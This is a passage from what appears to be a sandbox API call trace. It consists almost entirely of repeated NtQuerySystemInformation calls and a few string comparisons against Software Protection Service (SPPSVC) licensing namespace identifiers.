SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0229.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0229.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x20, ResultLength=0x0) [0229.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x20, ResultLength=0x0) [0229.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0229.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x28, ResultLength=0x0) [0229.327] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0229.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0229.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0229.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0229.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd210, Length=0x28, ResultLength=0x0) [0229.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0229.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0229.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0229.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0229.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x20, ResultLength=0x0) [0229.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0229.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0229.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0229.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0229.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x20, ResultLength=0x0) [0229.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x20, ResultLength=0x0) [0229.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x20, ResultLength=0x0) [0229.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0229.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x28, ResultLength=0x0) [0229.343] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0229.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0229.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0229.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0229.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd210, Length=0x28, ResultLength=0x0) [0229.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0229.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.350] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0229.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0229.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0229.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x20, ResultLength=0x0) [0229.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0229.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0229.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0229.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0229.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x20, ResultLength=0x0) [0229.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x20, ResultLength=0x0) [0229.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x20, ResultLength=0x0) [0229.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd658, Length=0x50, ResultLength=0x0) [0229.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5d0, Length=0x28, ResultLength=0x0) [0229.359] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd658, Length=0x50, ResultLength=0x0) [0229.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd658, Length=0x50, ResultLength=0x0) [0229.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0229.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4c0, Length=0x28, ResultLength=0x0) [0229.360] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0229.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0229.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd540, Length=0x50, ResultLength=0x0) [0229.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd470, Length=0x38, ResultLength=0x0) [0229.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x28, ResultLength=0x0) [0229.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x28, ResultLength=0x0) [0229.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x28, ResultLength=0x0) [0229.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x28, ResultLength=0x0) [0229.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd470, Length=0x38, ResultLength=0x0) [0229.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x28, ResultLength=0x0) [0229.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x28, ResultLength=0x0) [0229.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd470, Length=0x38, ResultLength=0x0) [0229.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0229.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0229.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0229.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0229.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd470, Length=0x38, ResultLength=0x0) [0229.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x20, ResultLength=0x0) [0229.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x20, ResultLength=0x0) [0229.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x20, ResultLength=0x0) [0229.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.374] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc7520fd5a0 | out: lpSystemTimeAsFileTime=0xc7520fd5a0*(dwLowDateTime=0xe9fdf73b, dwHighDateTime=0x1d5fb6e)) [0229.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd658, Length=0x50, ResultLength=0x0) [0229.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd590, Length=0x28, ResultLength=0x0) [0229.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a8, Length=0x50, ResultLength=0x0) [0229.374] GetTickCount () returned 0x1179e65 [0229.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd378, Length=0x58, ResultLength=0x0) [0229.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x38, ResultLength=0x0) [0229.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0229.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0229.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0229.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0229.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x28, ResultLength=0x0) [0229.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x38, ResultLength=0x0) [0229.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x28, ResultLength=0x0) [0229.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 